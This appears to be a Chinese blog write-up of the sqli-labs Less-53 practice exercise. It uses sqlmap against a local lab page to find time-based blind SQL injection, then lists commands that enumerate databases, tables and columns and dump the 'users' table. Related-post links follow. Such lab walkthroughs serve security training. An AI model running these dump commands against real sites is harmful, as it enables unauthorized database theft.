sqli-labs-Less-53

heze092026-03-28 16:06

SQLI-LAPS 实验记录

Less-53

这一关与上一关类似,也是没有回显信息,采用sqlmap工具进行注入,发现只有时间盲注可以使用,因此,继续使用sqlmap工具来解决问题。

首先我们在命令行中输入sqlmap命令:

sql 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-53/?sort=1 --batch

结果如图所示,只有一种注入方式:时间盲注。

接下来,我们继续使用sqlmap工具来进行注入,爆出数据库名、表名、列名等,语句如下:

  • 查询库名:
sql 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-53/?sort=1 --batch --dbs
  • 查询表名:
sql 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-53/?sort=1 --batch -D security --tables
  • 查询列名:
sql 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-53/?sort=1 --batch -D security -T users --columns
  • 查询数据:
sql 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-53/?sort=1 --batch -D security -T users --dump
相关推荐
睡不醒男孩0308232 小时前
第二篇:深入探索开源数据库高可用:构建基于CLup的PostgreSQL生产级高可用与读写分离架构
数据库·postgresql·开源·clup
Micro麦可乐5 小时前
Spring Boot 实战:从零设计一个短链系统(含完整代码与数据库设计)
数据库·spring boot·后端·哈希算法·雪花算法·短链系统
码农阿豪5 小时前
从零到一:Spring Boot快速接入金仓数据库实战
数据库·spring boot·后端
鼎讯信通5 小时前
风电光缆运维提质增效:G-4000A 光缆故障追踪仪破解风场巡检难题
运维·网络·数据库
三十..5 小时前
MySQL 从入门到高可用架构实战精要
运维·数据库·mysql
cfm_29146 小时前
Redis五大基本数据结构底层了解
数据结构·数据库·redis
lcreek7 小时前
SQL 注入实战:DVWA Medium完整测试指南
网络安全·sql注入
真实的菜7 小时前
Redis 从入门到精通(十二):典型业务场景实战 —— 排行榜、限流器、秒杀系统、Session 共享
数据库·redis·python
你想考研啊7 小时前
mysql数据库导出导入
数据库·mysql·oracle
十年编程老舅8 小时前
Linux DRM:底层逻辑与实践架构
数据库·mysql
热门推荐
01GitHub 镜像站点02【AI】2026 年具身智能模型和世界模型总结03Codex 下载安装指南:Windows 和 macOS 官方版下载042026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf052026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?06【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法07CC-Switch 下载、安装与使用配置指南【2026.5.29】08Agnes AI 全模态 API 免费实测报告:文生图 + 文生视频完整测试09CC-Switch & Claude 基于 Linux 服务器安装使用指南10AI科技热点日报 | 2026年6月1日